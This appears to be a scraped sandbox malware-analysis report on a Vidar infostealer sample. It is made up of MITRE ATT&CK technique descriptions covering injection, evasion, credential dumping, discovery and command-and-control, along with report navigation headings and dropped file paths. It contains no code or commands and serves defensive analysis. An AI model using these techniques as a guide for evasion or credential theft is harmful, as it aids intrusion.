Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kO1P1YnLst.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBAKEBGIIDAFIDHIIECFCFIEGH

C:\ProgramData\DVWHKMNFNN.docx

C:\ProgramData\DVWHKMNFNN.xlsx

C:\ProgramData\EFOYFBOLXA.xlsx

C:\ProgramData\EHDHDHIECGCAEBFIIDHI

C:\ProgramData\FCGIJDBA

C:\ProgramData\HIIEGHJJDGHCAKEBGIJKJEBAFC

C:\ProgramData\HTAGVDFUIE.docx

C:\ProgramData\IEHDBGDHDAECBGDHJKFIDGCBFB

Windows Analysis Report
kO1P1YnLst.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre